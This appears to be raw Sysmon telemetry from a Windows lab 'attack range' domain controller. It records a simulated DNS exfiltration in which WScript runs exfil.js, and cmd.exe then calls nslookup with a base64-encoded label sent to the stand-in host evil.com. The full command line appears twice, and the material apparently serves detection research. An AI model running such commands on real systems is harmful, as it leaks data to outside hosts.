14:16:33.579{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.579{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-B240-000000005F02}4908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.579{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.579{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.579{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.579{2E1864BB-17C1-629A-B040-000000005F02}80407768C:\Windows\system32\cmd.exe{2E1864BB-17C1-629A-B240-000000005F02}4908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.590{2E1864BB-17C1-629A-B240-000000005F02}4908C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C1-629A-B040-000000005F02}8040C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldhoq.tmp 2>&1 10341000x8000000000000000201059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.548{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-B140-000000005F02}6148C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.548{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-B140-000000005F02}6148C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.548{2E1864BB-17C1-629A-B140-000000005F02}61486656C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-B040-000000005F02}8040C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.537{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-B140-000000005F02}6148C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.517{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-B040-000000005F02}8040C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.517{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.517{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.517{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.517{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.517{2E1864BB-17A1-629A-783D-000000005F02}55527736C:\Windows\System32\WScript.exe{2E1864BB-17C1-629A-B040-000000005F02}8040C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.527{2E1864BB-17C1-629A-B040-000000005F02}8040C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldhoq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000201048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.070{00000000-0000-0000-0000-000000000000}4832<unknown process>-udpfalsefalse127.0.0.1-52778-false127.0.0.1-53domain 354300x8000000000000000201047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.070{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52778- 354300x8000000000000000201046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.070{00000000-0000-0000-0000-000000000000}4832<unknown process>-udptruefalse127.0.0.1-52778-false127.0.0.1-53domain 354300x8000000000000000201045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.069{00000000-0000-0000-0000-000000000000}4832<unknown process>-udpfalsefalse127.0.0.1-52777-false127.0.0.1-53domain 23542300x8000000000000000201044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.517{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlulj.tmpMD5=20783302D7601A2AA375A824723F16E5,SHA256=71E896EDC683926A4A0C6EDE66358751D292E4E8C82F0E9349EA1FBAA2ABF001,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000201043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.069{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52777- 354300x8000000000000000201042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.069{00000000-0000-0000-0000-000000000000}4832<unknown process>-udptruefalse127.0.0.1-52777-false127.0.0.1-53domain 354300x8000000000000000201041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.069{00000000-0000-0000-0000-000000000000}4832<unknown process>-udpfalsefalse127.0.0.1-52776-false127.0.0.1-53domain 354300x8000000000000000201040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.069{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52776- 354300x8000000000000000201039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.069{00000000-0000-0000-0000-000000000000}4832<unknown process>-udptruefalse127.0.0.1-52776-false127.0.0.1-53domain 354300x8000000000000000201038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.996{00000000-0000-0000-0000-000000000000}3448<unknown process>-udpfalsefalse127.0.0.1-52775-false127.0.0.1-53domain 354300x8000000000000000201037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.996{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52775- 354300x8000000000000000201036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.995{00000000-0000-0000-0000-000000000000}3448<unknown process>-udptruefalse127.0.0.1-52775-false127.0.0.1-53domain 354300x8000000000000000201035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.906{00000000-0000-0000-0000-000000000000}4596<unknown process>-udpfalsefalse127.0.0.1-52774-false127.0.0.1-53domain 354300x8000000000000000201034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.906{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52774- 354300x8000000000000000201033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.906{00000000-0000-0000-0000-000000000000}4596<unknown process>-udptruefalse127.0.0.1-52774-false127.0.0.1-53domain 354300x8000000000000000201032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.906{00000000-0000-0000-0000-000000000000}4596<unknown process>-udpfalsefalse127.0.0.1-52773-false127.0.0.1-53domain 354300x8000000000000000201031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.906{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52773- 354300x8000000000000000201030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.906{00000000-0000-0000-0000-000000000000}4596<unknown process>-udptruefalse127.0.0.1-52773-false127.0.0.1-53domain 354300x8000000000000000201029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.906{00000000-0000-0000-0000-000000000000}4596<unknown process>-udpfalsefalse127.0.0.1-52772-false127.0.0.1-53domain 354300x8000000000000000201028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.906{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52772- 354300x8000000000000000201027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.906{00000000-0000-0000-0000-000000000000}4596<unknown process>-udptruefalse127.0.0.1-52772-false127.0.0.1-53domain 354300x8000000000000000201026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.802{00000000-0000-0000-0000-000000000000}2608<unknown process>-udpfalsefalse127.0.0.1-52771-false127.0.0.1-53domain 354300x8000000000000000201025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.802{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52771- 354300x8000000000000000201024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.802{00000000-0000-0000-0000-000000000000}2608<unknown process>-udptruefalse127.0.0.1-52771-false127.0.0.1-53domain 354300x8000000000000000201023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.802{00000000-0000-0000-0000-000000000000}2608<unknown process>-udpfalsefalse127.0.0.1-52770-false127.0.0.1-53domain 354300x8000000000000000201022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.801{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52770- 354300x8000000000000000201021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.801{00000000-0000-0000-0000-000000000000}2608<unknown process>-udptruefalse127.0.0.1-52770-false127.0.0.1-53domain 354300x8000000000000000201020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.801{00000000-0000-0000-0000-000000000000}2608<unknown process>-udpfalsefalse127.0.0.1-52769-false127.0.0.1-53domain 354300x8000000000000000201019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.801{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52769- 354300x8000000000000000201018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.800{00000000-0000-0000-0000-000000000000}2608<unknown process>-udptruefalse127.0.0.1-52769-false127.0.0.1-53domain 354300x8000000000000000201017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.696{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52768- 354300x8000000000000000201016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.694{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52767- 354300x8000000000000000201015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.694{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52766- 354300x8000000000000000201014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.614{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52765- 354300x8000000000000000201013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.614{00000000-0000-0000-0000-000000000000}7628<unknown process>-udptruefalse127.0.0.1-52765-false127.0.0.1-53domain 354300x8000000000000000201012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.614{00000000-0000-0000-0000-000000000000}7628<unknown process>-udpfalsefalse127.0.0.1-52764-false127.0.0.1-53domain 354300x8000000000000000201011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.614{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52764- 354300x8000000000000000201010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.614{00000000-0000-0000-0000-000000000000}7628<unknown process>-udptruefalse127.0.0.1-52764-false127.0.0.1-53domain 354300x8000000000000000201009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.614{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52763- 354300x8000000000000000201008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.614{00000000-0000-0000-0000-000000000000}7628<unknown process>-udptruefalse127.0.0.1-52763-false127.0.0.1-53domain 354300x8000000000000000201007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.524{00000000-0000-0000-0000-000000000000}8132<unknown process>-udpfalsefalse127.0.0.1-52762-false127.0.0.1-53domain 354300x8000000000000000201006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.524{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52762- 354300x8000000000000000201005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.524{00000000-0000-0000-0000-000000000000}8132<unknown 